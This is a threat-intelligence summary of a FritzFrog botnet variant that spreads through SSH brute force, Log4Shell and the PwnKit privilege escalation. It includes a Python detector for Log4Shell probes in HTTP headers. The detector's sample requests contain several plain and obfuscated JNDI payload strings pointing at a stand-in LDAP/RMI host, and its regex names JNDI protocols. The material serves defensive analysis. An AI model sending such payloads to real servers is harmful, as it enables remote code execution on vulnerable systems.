A new variant of the FritzFrog botnet has recently emerged [3], incorporating the Log4Shell exploit into its tactics [2]. This variant focuses on spreading within compromised networks and targets vulnerable servers through SSH brute force.

Description

The Log4Shell exploit targets a vulnerability in the Log4j Java logging library [2] that enables remote code execution on vulnerable servers [2]. Unlike previous versions [4], this variant spreads within already-compromised networks rather than targeting publicly accessible assets. It gains access to exposed servers through SSH brute force, then scans the internal network for HTTP servers commonly used by Java applications [2]. By sending specially crafted HTTP requests with Log4Shell payloads embedded in multiple headers [2], the botnet aims to trigger the vulnerability and have the target download and execute its binary [2].

It also attempts to exploit the PwnKit flaw in the PolKit Linux component to gain root privileges [1]; this is the Local Privilege Escalation exploit targeting CVE-2021-4034 in the pkexec component of Linux [2], which gives it root on vulnerable systems [2]. It evades detection by using Linux features to execute payloads directly in memory [2]. The botnet has also improved its ability to identify SSH targets by reading system files on compromised hosts [2], which aids its lateral spread once the perimeter is breached [2].

Although organizations have patched Log4Shell on internet-facing applications [1], many internal assets remain vulnerable to these attacks. This variant showcases the ongoing evolution and adaptability of the botnet [4].
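The header-borne probing described above is easiest to catch at a reverse proxy or WAF that logs request headers, provided every header is inspected and not just User-Agent. The Python below is an added example, not code from the page or from any of the cited reports: it collapses the Log4j lookup nesting commonly used to disguise the `jndi` keyword and flags each header carrying a JNDI lookup; the request records and host addresses are constructed.

```python
import re

# Log4j lookup forms commonly used to hide the literal "jndi" from naive
# string matching. Each is collapsed to what Log4j would substitute at lookup time.
_DEOBFUSCATION = [
    (re.compile(r"\$\{lower:([^{}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{upper:([^{}]*)\}", re.I), lambda m: m.group(1).upper()),
    # ${name:-default} and ${::-x}: an undefined lookup yields its default text
    (re.compile(r"\$\{[^{}]*?:-([^{}]*)\}"), lambda m: m.group(1)),
]
# A JNDI lookup pointing at any of the protocols a vulnerable Log4j 2.x would resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|rmi|dns|iiop|corba|nds|http)s?://", re.I)

def normalize(value, max_rounds=10):
    """Resolve nested lookups innermost-first until the value stops changing."""
    for _ in range(max_rounds):
        before = value
        for pattern, repl in _DEOBFUSCATION:
            value = pattern.sub(repl, value)
        if value == before:
            break
    return value

def find_log4shell_headers(headers):
    """Return the names of all headers whose deobfuscated value carries a JNDI lookup."""
    return [name for name, value in headers.items() if _JNDI.search(normalize(value))]

def scan_requests(requests):
    """Report (path, [suspicious header names]) for every request that carries a lookup."""
    findings = []
    for req in requests:
        hits = find_log4shell_headers(req["headers"])
        if hits:
            findings.append((req["path"], hits))
    return findings

# Constructed request records, as a proxy or WAF might log them (hosts are made up).
SAMPLE_REQUESTS = [
    {"path": "/api/status", "headers": {"User-Agent": "curl/8.4.0", "Accept": "*/*"}},
    {"path": "/", "headers": {"User-Agent": "${jndi:ldap://10.0.0.5:1389/a}", "Accept": "*/*"}},
    {"path": "/login", "headers": {
        "User-Agent": "Mozilla/5.0",
        "X-Api-Version": "${${lower:j}ndi:rmi://10.0.0.5:1099/b}",
        "Referer": "${${::-j}${::-n}${::-d}${::-i}:ldap://10.0.0.5:1389/c}",
    }},
]

for path, names in scan_requests(SAMPLE_REQUESTS):
    print(f"possible Log4Shell probe: {path} via {', '.join(names)}")
```

Feed it the header maps from your own proxy or WAF export; the last request shows why the page's "multiple headers" detail matters, since only the non-User-Agent headers carry the lookup there.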

Conclusion

This new variant of the FritzFrog botnet [3] [4], incorporating the Log4Shell exploit [2], poses a significant threat to compromised networks. It exploits the vulnerability in the Log4j Java logging library as well as the PwnKit flaw (CVE-2021-4034) in the pkexec component of PolKit on Linux. The botnet's ability to execute payloads directly in memory and its improved SSH target identification make it difficult to detect and mitigate. Although organizations have patched Log4Shell on internet-facing applications [1], internal assets remain vulnerable. This highlights the need for comprehensive security measures and ongoing vigilance to protect against evolving botnet tactics.

References

[1] https://www.helpnetsecurity.com/2024/02/01/botnet-log4shell-pwnkit/
[2] https://www.cyberkendra.com/2024/02/fritzfrog-botnet-expands-attack-arsenal.html
[3] https://www.darkreading.com/threat-intelligence/fritzfrog-botnet-exploits-log4shell-overlooked-internal-hosts
[4] https://thehackernews.com/2024/02/fritzfrog-returns-with-log4shell-and.html